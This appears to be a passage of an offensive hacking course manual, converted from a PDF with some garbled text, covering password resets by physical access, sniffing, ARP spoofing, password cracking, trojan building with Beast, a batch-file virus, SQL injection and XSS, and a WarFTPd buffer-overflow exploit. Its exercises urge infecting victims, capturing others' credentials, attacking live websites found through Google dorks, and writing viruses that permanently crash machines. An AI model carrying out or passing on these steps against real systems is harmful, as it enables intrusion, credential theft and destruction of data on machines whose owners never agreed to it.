script as this which automatically create a ADS file.

Physical Access Attacks:


Reset Windows Passwords.

Reset Linux Passwords.

Reset Linux Passwords:

Description:

A Linux machine can be made to boot as root user if we can modify the Boot loader at the start of the

machine.Linux may use either LILO or GRUB boot loaders to boot the operating system.

Either of the boot loaders will allow us to modify the boot options where we can modify to boot into

single user mode.

Booting into Linux single user mode:

At the boot loader instead of selecting the OS to boot type letter ‗e‘ to edit the line before boot.

Ubuntu by default give you an option to boot into the recovery mode where a root shell can be

dropped into.

The boot loader will then present you with a screen to edit the kernel boot options, where these

changes are to be made.

@ECHO OFF REM This batch file starts or opens a REM stream. Call with first param as filename REM and second param as stream name MKLINKtemp_%2%1:%2 STARTtemp_%2 DELtemp_%2


44

Find the line which starts with the word Linux and append to it the word ―single‖.

(OR)

Append the line init=/bin/bash.

Once the changes are done type ‗b‘ in some cases (or) CTRL + X keys to boot with changes.

Reset Windows Passwords:

Windows stores local usernames in the Security Accounts Manager (SAM) database as well as in other

places. Please read the following article if you are not familiar with the SAM:

http://www.microsoft.com/technet/archive/winntas/tips/winntmag/storpass.mspx?mfr=true

The SAM file can be found in %SYSTEMROOT%\system32\configand is inaccessible for reading,

copying, or writing while Windows is running.The solution is to reboot the system with a live os which

makes the file system readable.

In this example we will be looking at a tool called chntpwwhich is used to modify the contents of SAM

file.

Using chntpw

Instructions for using chntpw:

Boot a live OS like backtrack into windows machine.

Mount the file system which contains the operating system installed.

Give the path of SAM file to chntpw

The tools will prompt for changing the password file or blanking the password.

Choose your desired option and the tool will save accordingly.

Reboot the machine into windows, you should be able to login without any difficulties.

This screenshot shows modifying of a sample SAM and system file.

http://www.microsoft.com/technet/archive/winntas/tips/winntmag/storpass.mspx?mfr=true


45


46

TCPDUMP (Network Analyzers)


To intercept data from networks and monitor it

To filter necessary packets.

Description:

Network analyzers are used to monitor packet data in a network for the purpose of troubleshooting

network related problems. However, in the field of security these tools and techniques have greater

importance as they can be used to compromise the security of network and systems.


47

Basic Usage

Based on the kind of traffic we are looking for, we can use a different combination of options to

tcpdump, as can be seen below:

1. Basic communication // see the basics without many options

# tcpdump -nS

2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help

# tcpdump -nnvvS

3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet

# tcpdump -nnvvXS

4. Heavy packet viewing // the final "s" increases the snap length, grabbing the whole packet

# tcpdump -nnvvXSs 1514

Here's a capture of exactly two (-c2) ICMP packets (a ping and pong) using some of the options

described above. Notice how much we see about each packet.

Common Syntax

Expressions allow you to trim out various types of traffic and find exactly what you're looking for.

Mastering the expressions and learning to combine them creatively is what makes one truly powerful

with tcpdump.

root # tcpdump -nnvXSs 0 -c2 icmp tcpdump: listening on eth0, link-type EN10MB (Ethernet), 23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0 0x0000: 4520 0054 882b 0000 3001 7cf5 45fe d52b E..T.+..0.|.E..+ 0x0010: 4815 222a 0800 3530 272a 0000 25ff d744 H."*..50'*..%..D 0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 .^.............. 0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............!"# 0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $%&'()*+,-./0123 0x0050: 3435 3637 4567 23:11:10.370344 IP (tos 0x20, ttl 64, id 35612, offset 0, flags [none], length: 84) 72.21.34.42 > 69.254.213.43: icmp 64: echo reply seq 0 0x0000: 4520 0054 8b1c 0000 4001 6a04 4815 222a [email protected]."* 0x0010: 45fe d52b 0000 3d30 272a 0000 25ff d744 E..+..=0'*..%..D 0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 .^.............. 0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............!"# 0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $%&'()*+,-./0123 0x0050: 3435 3637 4567 2 packets captured 2 packets received by filter 0 packets dropped by kernel root #


48

There are three main types of expression: type, dir, and proto.

Type options are host, net, and port. Direction is indicated by dir, and there you can have src, dst, src

or dst, and src and dst.Here are a few that you should definitely be comfortable with:

host // look for traffic based on IP address (also works with hostname if you're not using-n)

# tcpdump host 1.2.3.4

src, dst // find traffic from only a source or destination (eliminates one side of a

hostconversation)

# tcpdumpsrc 2.3.4.5

# tcpdumpdst 3.4.5.6

net // capture an entire network using CIDR notation

# tcpdump net 1.2.3.0/24

proto // works for tcp, udp, and icmp. Note that you don't have to type proto

# tcpdumpicmp

port // see only traffic to or from a certain port

# tcpdump port 3389

src, dst port // filter based on the source or destination port

# tcpdumpsrc port 1025

# tcpdumpdst port 389

src/dst, port, protocol // combine all three

# tcpdumpsrc port 1025 and tcp

# tcpdumpudp and src port 53

You also have the option to filter by a range of ports instead of declaring them individually, and to

only see packets that are above or below a certain size.

Port Ranges // see traffic to any port in a range

#tcpdumpportrange 21-23

Packet Size Filter // only see packets below or above a certain size (in bytes)

#tcpdump less 32

#tcpdump greater 128

[ You can use the symbols for less than, greater than, and less than or equal / greater than or equal

signs as well. ]

// filtering for size using symbols

#tcpdump> 32

#tcpdump<= 128

Writing to a File

Tcpdump allows you to send what you're capturing to a file for later use using the –w option, and

then to read it back using the -r option. This is an excellent way to capture raw traffic and then run it

through various tools later.

Capture all Port 80 Traffic to a File

# tcpdump -s 1514 port 80 -w capture_file


49

Then, at some point in the future, you can then read the traffic back in like so:

Read Captured Traffic back into tcpdump

# tcpdump -r capture_file

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,

software and communications protocol development, and education.

Steps to Use the program:

Capturing the Packets can be initiated by selecting the appropriate Interface from the

interface list as visible in the above picture.

Packets will be captured as soon as the interface is selected the next Image will show how the

packets are shown to us.

Packet information can be viewed by double clicking on a specific packet.

Wireshark offers a great deal of filters which help sort out the necessary packets to be viewed.

To apply filters type the filter located below the menu bar. Pre-Built expressions can also be

used. They can be accessed by clicking on Expressions beside Filter Box.


50

As we can see above there are many number of packets in this window. These can be recognized

by looking at the protocol column to know whether it is a HTTP, TCP-RAW DNS or any other packet.

Wireshark makes it easy by color coding each protocol. The one in blue is a DNS packet and the green

one is a TCP or TCP-HTTP packet.

Since there are thousands of packets that are being intercepted at a second, it is a tedious job to

locate a particular packet among them. This is where the filter feature comes in handy.

Wireshark comes with lot of built-in filters and also gives us the freedom to make our own filters.

For Example if we want to look at packets coming from a specific domain the filter would be

Filter: ip.src==10.42.43.38

< More Examples >

Filter: ip.src == 10.42.43.38 &&ip.dst == 10.42.43.1(Show Packets from SRC IP to DSTN IP)

Filter: HTTP (Show only HTTP packets)

Filter: TCP || HTTP (show TCP or HTTP packets or BOTH)

Apart from looking at the protocol information, the best feature of wireshark is that we can re-create

or see source of the entire webpage, binary or any other file that is being transmitted through the

network.


51

Following a Packet Sequence:

Click on the Follow TCP Stream as shown above to look for sequential packet information.

The follow Tcp stream selection will land you in a window as shown below. This particular window will

show the combined output of all the packets selected by a particular filter or by default it takes IP as

filter and shows all data associated with it.

The information showed in red is the data received and the one in blue is information that is being

sent to the server.

So by sniffing the networks any un-encrypted information can now be intercepted and seen by the

above process. By using specific filters and combining the data gathered from the above windows we

can re-create the packet structure to make a binary file.


52

Exercises:

• Try to capture only the packets of only HTTP protocol using tcpdump/wireshark

• Capture the packets containing Login credentials of a website.

• Try to capture packets from a chat messenger/irc chat.

Arp Spoofing (Ettercap)


To attack ARP protocol and capture all outgoing and incoming packets for a system.

To be comfortable using Ettercap tool.

Description:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live

connections, content filtering on the fly and many other interesting tricks. It supports active

and passive dissection of many protocols and includes many features for network and host

analysis.

In order to poison an Arp cache, the Ettercap will first scan (Hosts->Scan for hosts) the entire

netmask and then clicking on Hosts->Hosts will provide the list of active members in the

network

• On the (Targets->Show Targets) screen Ettercap will show you the list of hosts, targets has to

be selected by selecting the IP and clicking on add to Target.

• The attack can be started by clicking MITM->Arp poisoning as show below.

• Click on Sniff remote connections when prompted to sniff packets from the victim machine.

• Once the Arp cache is poisoned the packets captured can be viewed on any packet sniffer

such as Wireshark.


53

Arp Poisoning

Exercises:

• Perform an ARP attack on a local switch; this attack can result in total collapse of the

network. (You have been warned!!)


54



55


PASSWORD HACKING:


To crack passwords using any of the three techniques, dictionary brute-force, and

hybrid attacks.

To crack MD5, NTLM passwords.

Description:

Password-based authentication is one of the weakest forms of user verification, the main reason being

that most times, the choice of the password is left to the user (which, as you know, is the weakest part

of the security chain).

Even if passwords are not user created—if, for instance, they are generated randomly—the security of

the password is still left to the user. It's surprisingly common for users to writer their password on a

sticky note and keep it under their keyboard. Unfortunately, it seems like corporate policies are not

capable of enforcing password security to a satisfying level.

HYDRA: Brute Force tool

As described by its authors, Hydra is the best-parallelized login hacker for Samba, FTP, POP3, IMAP,

Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco, and more. Hydra includes

SSL support and is part of Nessus. Hydra supports a huge number of protocols and is probably the

most well-known password brute force tool.

Type hydra in a BackTrack console to see the many Hydra command line options


56

FTP brute forcing with hydra:

The above picture shows a success full http password cracking where

username = admin & password = P@ssword1

Open console and type in hydra use the ―-l ‖to mention the user name if you are sure.

Use the ―-P‖ option to mention the word list or password list.

Finally mention the target ip using ―-V‖ and after that the protocol on which to attack.

-e ns does Additional checks, ―n‖ for null password, ―s‖ try login as pass

-t TASKS run TASKS no. of connects in parallel.

-f exit after the first found login/password pair.

-s PORT if the service is on a different default port, define it here.

-v/-V verbose mode/ show login+password for each attempt.

Using Lophtcarck to crack the hashes:

L0phtCrack is password audit and recovery tool for Windows and Unix passwords.

L0phtCrack 6 provides two critical capabilities to system administrators:

● L0phtCrack 6 helps administrators secure Windows and Unix-authenticated networks through

comprehensive auditing of Windows NT/2000/XP/2003/Vista/2008 and Unix user account

passwords.

● L0phtCrack 6 recovers Windows and Unix user account passwords to streamline migration of

users to another authentication system or to access accounts whose passwords are lost.


57

Importing hash to Lophtcrack :

Step 1: click on import hash then select import from pwdump file.

Step 2: Select your hash file and click ok.

Step 3: Click on Begin.


58

As you can see lophtcrack has cracked the hashes for us .

Exercises:

i. Crack the windows passwords by copying SAM and system file onto temporary file

and use ―cain and abel‖ to crack passwords.

ii. Learn to use johntheripper password cracking tool.

iii. Crack the the hash ―28d2464b121f120a41f4cd5c496cae2c‖ (Use all the three types of

password cracking and document the cracking procedure.)

Module Seven: Malwares, Rootkits and Trojans

Objectives:

● To build a trojan using a trojankit(Beast 2.07).

● To create a batch file virus.

Tools


59

● Beast(v2.07): This is a trojan building kit which is used to create trojans using a GUI.

● Notepad

● BAT to EXE converter

Beast

This is a powerful trojan building tool. It can be obtained

fromhttps://sites.google.com/site/trojandownloads/beast-2-07. However this link was only functional

at the time of writing, and you may need to look for another link.

Note:Your Anti-Virus program may pick this up as a severe threat, as the trojan kit itself was

released a couple of years back. To successfully perform this demo, you might have to disable your

AV‘s protection mechanism.

Trojan

A trojan is a form of malware which acts as a ‗remote administration tool‘. Upon execution, the

server can establish a link with the client(victim). Although this demonstration is carried out using

Beast, in a real world scenario, other trojan kits might be more effective. The attacker must once again

keep in mind that the concept behind the attack is what matters and should perhaps look to create

his/her own trojan kit.

Building a Trojan using Beast

● Launch the Beast GUI.

● Click on Build Server. This is the settings page of the file which will be executed on the

victim‘s machine.

● In the Basic tab, specify the network settings for the file. The file will be referred to as

‗server.exe‘. Here you can also specify the program in which the trojan is to be injected. You

can also create a Password which will be required to connect to ‗server.exe‘ when it is

executed on the victim‘s computer.

https://sites.google.com/site/trojandownloads/beast-2-07


60

● The Notifications tab provides options for ‗server.exe‘ to inform the attacker about its current

status. The media of communication could be Email, ICQ, etc.

● The Startup tab is self-explanatory and provides configuration options for the startup event

of ‗server.exe‘

● The AV-FW Kill page provides settings for the disabling of Anti-virus software and Firewall. It

provides options for specific firewalls/AVs. Apart from this, there are also options for the


61

periodic killing of AVs/firewalls and the disabling of Windows XP firewall.

● Click on Misc. Most of the functions are self-explanatory. However of particular note are:

○ Melt server on Install-This deletes ‗server.exe‘. However the trojan is injected into

various other files and programs, ensuring its proper functioning.

○ Enable keylogger-The keylogger logs all keystrokes and user activity. It can be used to

monitor all user activity.

○ Delay execution-This is used to delay execution of the trojan, so as to avoid the

suspicion of the user.


62

● Click on Exe Icon to specify the icon of ‗server.exe‘.

● You should now see ‗server.exe‘ in the directory where you have installed Beast. Go back to

the main window of Beast and click on Binder, to bind ‗server.exe‘ with another inconspicuous

file, such as a game, greeting, etc. This is where the attacker‘s socialengineering skills come

into play.

● The final file should be renamed accordingly and sent to the victim‘s computer. Once again,

this will require social engineering on the part of the attacker.

Connecting to the victim’s computer

● Launch Beast. Specify the connection parameters and click on Connect to connect to the

victim‘s machine.


63

● Once you specify the connection parameters

● Click on Managers. Here you can explore the Registry, File system, applications running and

active processes.


64

The features available are same as that you would have when you operate your own

computer.

● Click on Windows and you can choose to Shut Down, Restart, Log Off, Crash the system, etc.

● Click on Lamer Stuff. All the options are self explanatory and are mostly used to create a

nuisance for the victim.

● Click on Fun Stuff. Once again, the options are self explanatory. Chat is used to pop up a chat

window on the victim‘s computer for real time conversation between the attacker and victim.


65

● Click on Server. Click on Update Server, here you can update the server remotely. Apart from

this, you can also kill the server.

● Click on Misc. Here you can change the System Time, send messages to the victim‘s desktop,

get log of the key logger, etc.


66

● Following is a sample of the decrypted log given by the logger:

************ Boot:[09/03/2013]-[16:56:32]

[Beast2.07]-[16:56:32]

[Beast 2.07]-[16:56:33]

r

[Run]-[16:56:44]

abcdedffaasdsadarun

[Program Manager]-[16:56:50]

[Beast 2.07]-[16:56:51]

[Information]-[16:56:53]

asdasfaf

[Decrypt Log File]-[16:57:02]

************ Boot:[09/03/2013]-[17:27:02]

[Beast2.07]-[17:27:02]


[Beast 2.07]-[17:27:04]

[Run]-[17:27:23]


[Paint]-[17:27:54]

[Untitled - Paint]-[17:27:54]

vs

[Save As]-[17:27:56]

7


[7.png - Paint]-[17:27:59]

[Beast 2.07]-[17:28:03]

r

[Run]-[17:28:09]


[Paint]-[17:28:09]


67


vs

[Save As]-[17:28:11]

8


[8.png - Paint]-[17:28:14]

[Settings]-[17:28:19]

[Beast 2.07]-[17:28:24]

Batch File Viruses

Viruses are malwares which can replicate themselves and spread from one computer to the other.

It is a common misconception that Viruses also include Trojans, botnets, adware, etc., this is

untrue and this is infact the definition of malwares. One should note that every virus will be a

malware, however the converse need not always be true.

We will now try to create a simple Batch file virus of our own. These viruses will generally not be

detectable by AVs as they are supposed to be simple code. However, they can be read easily by the

user. To avoid this, you can download a ‗BAT to EXE‘ converter online. The one being used in this

tutorial is available athttp://www.battoexeconverter.com/. Any other converter will also do.

Note: While playing with batch virus, you might cause irreversible damage to your machine, to

the extent that you might have to format your system. Hence, it is best to carry this out on a virtual

machine.

Note:While these viruses might seem as only potential nuisance makers. They can be written

effectively so as to bring down an entire machine.

● Open Notepad.

● Write the following code:

1 @echo off

2 :x

3 start notepad

4 start explorer

5 start control

6 goto x

Line 1 prevents the commands from being displayed on the screen. Line 2 is a label. We

will come to its use in just a moment. Lines 3-5 are used to launch Notepad, Explorer and

Control Panel. Line 6 makes the program go back to Line 2(with the help of the infamous goto

statement and label ‗x‘), causing repeated execution of Lines 3-5. Thus, a large number of

Notepad, Explorer and Control Panel Windows are launched. This might cause the system to

crash.

● Save the file as ‗batchvirus.bat‘

http://www.battoexeconverter.com/


68

● Now to convert it to an EXE file, open ‗Advanced BAT to EXE converter‘.

● Click on Open and select the BAT file we just created.


69

● Click on Build EXE and select Start Invisible.

● Select the file path to save the EXE to.

● Sure enough, we have our own batch file Virus.

There can be a number of ways to develop batch viruses. It is only bounded by your creativity.

However, it might be a challenge to use batch viruses to actually infect other files.


70

theHarvester.py

theHarvester.py is an information gathering tool used to list email addresses and other info from the public domain. It is a part of the distribution for BackTrack. This particular demonstration makes use of BackTrack5. In order to perform this demonstration, follow the following steps:

● Launch BackTrack5. Go to /pentest/enumeration/theharvester. This is where

theHarvester.py is located.

● Launch terminal. Type in the following:

root@bt:~# cd /pentest/enumeration/theharvester ● Now that we are inside the directory, we need to launch the script. To do so, type in the

following:

root@bt:~# ./theHarvester.py

● We will now try to use this tool to gain information about harvard.edu

● The next command to be entered is:

Here ‘-d’ is used to specify the domain name to search for and ‘-b’ is used to specify the

data source to use (Google, Bing, etc.)

root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d

harvard.edu -b google


71

● The command rightly lists all the email addresses it can find. Upon scrolling down, we can

also find the various hosts found.


72

The information obtained using theHarvester.py is of vital importance from a social engineering perspective. Gaining email addresses can help us pinpoint people with efficiency. This can of course be of huge help when employing social engineering tactics.

Exercises

1. Using a Trojan building kit, other than Beast, build a Trojan and successfully infect a

victim machine.

2. Without the use of any Trojan building kit, using only programming skills, try to create a

program which can act as a RAT. It need not pack all the features demonstrated, but

should be able to carry out basic functions.

3. Read more about batch file programming and use it to build a batch file virus which can

permanently crash the machine.

4. Using theHarvester.py, find out the email addresses associated with a random server

and use them to pinpoint a particular person.


73

Module Eight: Getting Offensive

Common Web Application Attacks

Objective

● To carry out common web application attacks, including SQL injection, XSS and Basic Access

Flaws.

● To use google dorks for information gathering.

Tools

● WebGoat-This is a controlled environment used for practising and learning about web

application attacks. The purpose of WebGoat is to provide hands-on-experience in carrying

out attacks.

● TamperData-Firefox plugin used to intercept HTTP requests.

● Live HTTP Headers-Firefox plugin used to read HTTP headers.

Netcraft

http://news.netcraft.com/ is a service which can be used to gather information about websites.

The IP Adress, OS running on the server, hosting country, risk rating, etc. are often quite useful in

narrowing down on the type of attacks to be carried out on the given site during a PenTest.

A typical site report looks as follows.

http://news.netcraft.com/


74

Configuring WebGoat

WebGoat is available for download fromhttp://code.google.com/p/webgoat/downloads/list. The

download consists of information on setting up the application(README.txt). As it contains a bundle

including Apache Tomcat, JRE and the application itself, it is self sufficient. If you get to the following

http://code.google.com/p/webgoat/downloads/list


75

screen successfully, it means that you are running WebGoat successfully.

Note: While using WebGoat, disconnect from the network as the application makes the network

also vulnerable to attacks

SQL Injection

SQL Injection is an attack which looks to manipulate the SQL command sent to the server so as to

get data from the database, generally by virtue of the input given by the attacker.

SQL Injection on WebGoat

● Go to Injection Flaws > Stage 1: String SQL Injection


76

● In the password field, try to put in a random username. For eg. ‗Sam‘

As expected, we are unable to log into the system.

Note: A real website will definitely not have its SQL commands up for display. So try and

work without it.

Whatever input the attacker gives is delimited by quotes in almost all cases. The idea here is to

manipulate this syntax, so as to gain user access without having valid credentials.

Before doing this, install the TamperData add-on for Firefox.

Using Tamperdata

After installing,

● In your Firefox window, go to Tools>TamperData.

● Go to the TamperData window and click on Start Tamper.

● Put in any random password, eg.‖Pass123‖ in the password field. Click on the Login button.

TamperData should show the following screen.


77

● Click on Tamper. This allows you to intercept the POST request and change the password

value that is sent to the server.


78

● The string ‗ or 1=1-- modifies the (probable) SQL command as follows:

select * from users where user=‘Larry‘ and pass=‘xyz‘;

To

select * from users where user=‘Larry‘ and pass=‘‘or 1=1--‘;

The 2nd statement passes a condition (1==1) which will always be true, which returns all the users

in the database and by default logs in the 1st user in the table.


79

● The above page shows us that we have successfully carried out the attack, giving us access to

the user‘s account.

Havij


80

Havij is an automated SQL injection tool for pen testers. This can be used to greatly simplify the

process.


81

It also allows direct access to the database. All the tables are listed out with complete access.

The target URL should be the address of the page along with a marker(%inject_here%) after the

parameter which is to be used form manipulation.

Handy Tricks

● SQL syntax may vary from web application to web application. Hence try different

combinations to gain access

● Do NOT remember ‗ or 1=1-- as a keyword. Understand the functioning to exploit the

mechanism.


82

● At times input validation on the front end might not allow you to enter special characters. At

such times it is best to use TamperData or Burp to intercept the HTTP requests.

● Although tools such as Havij can be used to easily compromise security. However, one should

be careful not to use it as a skiddies tool.

Cross Site Scripting

Stored XSS

The injection/storage of a malicious script in a web application such that it is executed by the

client‘s browser is called a XSS attack. Following is an example of a Stored XSS attack using WebGoat.

● Launch WebGoat and go to Cross Site Scripting(XSS)>Stored XSS Attacks

● Put in a random title and in the Message field, enter the script to be executed. Although the

script used here is pretty straightforward, one can replace it with a malicious script.

● Click on Submit to save the message to the Message List.

● The newly stored message should appear on the Message List.


83

● Clicking on it should yield the following result.

The appearance of the alert confirms the successful execution of the script and the attack.

Reflected XSS

In this attack, the attacker usually creates a URL which contains the attack script and mails it or

uses other media to allow the user to access it, thereby compromising the user‘s security.

● Launch WebGoat, go to Cross Site Scripting>Reflected XSS

● We have to look to exploit the access code field.

● In the access code field, after the three digit code, put in the following code:

<script>alert(‗Reflected XSS‘)</script>


84

● Click on Purchase. This should result in the showing of the alert.

● Hence, we have successfully executed the Reflected XSS attack.

Handy Tricks

● When working on live websites look to check fields such as search fields for Reflected XSS.

● Many forums and message boards are still vulnerable to Stored XSS.

● Use Google Dorks to look for the message board list in specific websites.

Basic Authentication Flaws

Often Web Applications have improper mechanisms in place to retrieve forgotten

passwords/process them. The attacker looks to exploit this vulnerability in order to gain access.

Forgot Password

This vulnerability is present when the security question protecting the password is not as strong as

the password itself.

● Launch WebGoat. Go to Authentication Flaws>Forgot Password.

● Enter the username as ‗webgoat‘ in the username field.

● The security answer should be pretty obvious. Try a couple of colours, such as

‗blue‘,‘green‘,etc.

● Finally, ‗red‘ will get us through.


85

Note: Although this vulnerability involves more of social engineering, than actual

exploitation of a flaw in the system, it is still effective and can still be used to bypass the

authentication of major mailing sites.

Basic Authentication Flaw

Basic Access Authentication is used by the web browser to provide the username/password when

making a request to the server. This information is encoded and sent to the server. When the server

sends the encoded form back to the browser, the HTTP header is read and the encoded value is

decoded to get the user credentials.

● Launch WebGoat, go to Authentication Flaws>Basic Authentication.

● Open the Live HTTP Headers(ensure that the Capture field is marked) and refresh the Basic

Authentication page.

● The highlighted entry is the authentication header along with the encoded value of user

credentials.

● Copy only ‗Authorization‘ to the WebGoat Authentication Header Name field.

● Now we need to decode the base64 encoded value so as to get the username/password out

of it.


86

● Go tohttp://yehg.net/encoding/index.php and paste the base64 encoded string in the textbox

given.

● Click on ‗Convert me!‘ to get the decoded value.

● There is the required username/password. Copy this string to the 2nd textbox on the

WebGoat Basic Authentication Flaw page.

● Click on Submit. You will now get a page saying that the vulnerability has been exploited

successfully.

● Now we will try to login using the ‗basic:basic‘ credentials, given on the Congratulatory page.

● Clear your browser‘s Cookies and Active Login sessions.

● In the URL field, put in the following URL:

http://yehg.net/encoding/index.php


87

http://basic:basic@localhost:8080/WebGoat/attack?Screen=187&menu=500&Restart=18

7

● Click on Submit, we should now see the following dialog box.

● Upon clicking on ‗OK‘ you will be logged in successfully into the website.

● Hence we have successfully exploited the Basic Access Authentication Flaw.

Google Dorks

Google dorks are advanced searching techniques using Google. They are used to narrow down on

specific content on the web or even in a particular website. For Ex. While checking for SQL Injection on

a website, one will of course want to look at the login page. However searching for this particular

page manually will take some effort and may also turn out to be cumbersome. Hence, one can employ

Google Dorks to search for the probable login pages in the site.

Typical Google Dork syntax:

dork1:parameter1 dork2:parameter2 query.

Common Google Dorks

● cache: This is used to search cached pages for the given search query.

● link:It returns all the pages containing a link to the given parameter. For eg.

link:www.nsd.org.in will return all the pages containing links to the given URL.

● related:This is used to display pages similar to the one specified

● info:It will return whatever information google has about the given site. There should be no

space between the dork and the parameter.

● inurl:This will return all the pages containing the query word immediately after the dork in the

URL of the page. For eg. [inurl:nsdisac] will return all the pages which contain ‗nsd‘ in the URL

and ‗isac‘ anywhere in the document.

● allinurl:This will return all the pages containing all the query words after the dork in the URL

of the page. For eg. [inurl:nsdisac] will return all the pages which contain both ‗nsd‘ and ‗isac‘

in the URL.

● intitle:This will return all the pages containing the query word immediately after the dork in

the title of the page. For eg. [inurl:nsdisac] will return all the pages which contain ‗nsd‘ in the

title and ‗isac‘ anywhere in the document.

● allintitle:This will return all the pages containing all the query words after the dork in the title

of the page. For eg. [inurl:nsdisac] will return all the pages which contain both ‗nsd‘ and ‗isac‘

in the URL.

● site:This is used to restrict the results to a given domain.

Google Dorks can be combined to specifically look for results. For eg. The following search query

can be used to search for the login page in a particular website, so that it can be checked for SQL

Injection.

inurl:login site:silverzone.org

http://www.nsd.org.in/


88

Exercises

i. Using Google Dorks, search for a website which contains a login page and try to execute SQL

Injection on it.

ii. Read about Shopping Cart Attack and try to carry it out on a ecommerce website using

TamperData/Burp Suite.

a. Hint: Shopping Cart Attack involves interception of HTTP requests(demonstrated in

the SQL Injection part) so as to change the value of the bill and avail items at a lower

price.

iii. Complete the XSS challenge in WebGoat.

Module Nine: Exploiting

Buffer Overflows:


To be able to perform buffer overflows in a program.

To understand and exploit programs.

To understand and use debuggers effectively.

To attack and get control of a system.

Description:

Buffer overflows are a special type of technique where we bombard the program with large

amounts of random data, which causes the program to fail at a certain point.

We place in a debugger to catch the exception points, errors, and overflowing areas, and

critical areas like EIP being overwritten.

For this example we will be using WarFtpd1.6 FTP server on windows XP.

WarFTPd:


89

i. Notice the little lightening icon up there?

ii. Click that to start the ftp server.(Remember ftp server listens at port 21)

iii. You can connect with telnet or nc command to the ftp server

# nc<target.ip> 21

After connecting, you can type ―USER‖ command to give the username and ―PASS‖

command to provide with password.

Here I have entered more than 20 ‗!‘ characters but it was not enough to crash the system lets try

with more characters.

The above step maybe repeated until you crash the system or observe in debugger the EIP being

overwritten.


90

For this we can use a simple FTP login script to easily login into the ftp server.

Write and save the above code as <Somename>.pl and execute it

#perl<Somename>.pl

Now next step it to generate large string for the input USER and PASS, lets use Perl to generate it

for us.

# perl –e ‗print ―A‖ x 1000‘

Now copy all ‗A‘ and paste it in place of username and password in the above script.

Run the script and see if the application crashes.

If the program is not responding or closed automatically, it means it crashed!

If you have not attached the debugger already, do it now, and repeat the above step of executing

the Perl script with long string of A‘s.

use strict; use Net::FTP; my $host = "server.IP"; my $user = "user"; my $password = "password"; my $f = Net::FTP->new($host) or die "Can't open $host\n"; $f->login($user, $password) or die "Can't log $user in\n";


91

Attaching the debugger:

Using Ollydbg

Ollydbg is one of the best RING 3 debuggers for windows applications and is the one used in

this demonstration.

To attach a process click File->Attach-> select the <Process name> and click on attach to attach

the process.

Once the process is attached, run our perl script again and observe ollydbgshowup the program crash.

The program crashes again, and the debugger shows a message saying ―Access violation while

executing 41414141‖. What it means is that we have tried to go to address 41414141 for executing

code, since this not a valid address, the system cannot proceed and all the execution halts.


92

Observe what all registers are overwritten.

Observe on the right Upper block of ollydbg which shows register values of CPU.

The values of ESP, EBP, EDI and EIP are showing 41414141 which is nothing but our character ‗A‘

shown as ascii value.

This is our proof of concept that the value of EIP can now be overwritten, which gives us control to

jump into other memory places.

If we can plant a Shellcode somewhere in the memory then we can use this EIP to point it the starting

address of our Shellcode.

Writing the exploit:

To write the exploit we need to know some details in accurate

Let’s see what we already know,

We already know that the program crashes when we send 1000 A‘s.

The EIP is successfully overwritten with A‘s.

What we need to know:

• We need to know exactly at which byte the EIP is being overwritten.(Without knowing

it, we can‘t write our exploit as we will not know where to place the address of our

Shellcode in the exploit.)

• We need to know exactly how many bytes we have after EIP , that ESP points to. (This

is required as our Shellcode will start from address where our ESP points to and our

Shellcode cannot exceed this size.)

Finding the exact Byte:

To find the exact byte, we can use a trial and error methods by decreasing the boundaries of our

variables, i.e instead of 1000 A‘s we try to send 500 ‗A‘ and 500 ‗B‘

In the next case, we would decrease it by sending 400 ‗A‘ and 400 ‗B‘ and so on.


93

The other easier method we can use is to generate a unique string, send it across, observe it in ollydbg

and find the exact byte at which the 4 characters of EIP are present in the unique string.

In this case we have program in backtrack to generate and locate the exact byte num.

This tools is a part of metasploit tools and is available in /opt/metasploit/msf3/tools/

Use #pattern_create.rb to generate unique string.

Pattern_create.rb usage:

#./pattern_create.rb 1000 (will create 1000 unique characters)

#./pattern_create.rb 1000 A B C (Creates 1000 characters of ―ABC‖)

Replace the 1000 A‘s with the newly generated unique string in the perl script for ftp login.

Before executing the program remember to restart the program back in windows XP.

Once the script is executed and the program crashes, observer the values of EIP in ollydbg.

The value here is ―32714131‖, to find the exact byte we use the program. pattern_offset.rb

which is in the same folder as pattern_create.rb.

o pattern_offset usage:

#./pattern_offset ―unique value‖


94

So, the exact offset where EIP gets overwritten is ―485‖

Finding the Buffer space:

We have now found the exact byte at which EIP is overwritten, The next step is to find the

amount of buffer space available in the stack for executing our Shellcode.

In the ollydbg look for the unique string at ESP(this points to where the stack resides or our

Shellcode will be residing.)

The marked letters(q4Aq5Aq6) are the 4 bytes for

which we need to find the offset for to know the exact byte where stack originates.

We use the same patter_offset to find this offset too.

Let‘s check if from 493 bytes, the buffer really starts

To check lets modify our perl script.

#perl –e ‗print ―A‖ x 485. ―BBBB‖. ―C‖ x 4 . ―STAR‖ . ―D‖ x 100 ‘

This will generate string that identifies exact bytes of EIP and ESP

Copy the generated string and place it variables username and password in our perl script and

execute it after restarting the program in windows Xp


95

This shows that indeed EIP is at 485 bytes since it is written by 42(Ascii character B) and ESP is

written by by ―STAR‖ which starts at 493.

Look at the stack dump and calculate the number of bytes that is overwritten by the letter ―D‖

represented in ASCII character ‗42‘ until it hits the SEH record.

That gives us 72 bytes of free space in the stack where our Shellcode can go.

Finding JMP ESP instruction.

The need to find JMP ESP instruction is that we cannot hardcode the address and tell our

code to directly jump to our Shellcode, since we can be sure of where ESP starts from we can

overwrite the EIP with an address where JMP ESP instruction is located and once executed it jumps

directly to our stack or where our Shellcode resides and starts executing it.

There are various tools to find the JMP ESP instruction in a library.

We will use ollydbg to find the instruction.

Let‘s look at libraries used by warftp program in ollydbg. (Click on the icon to show the list of

libraries used by the program. )


96

In any exploit you write, try to find JMP or other instructions you need in a library that you are

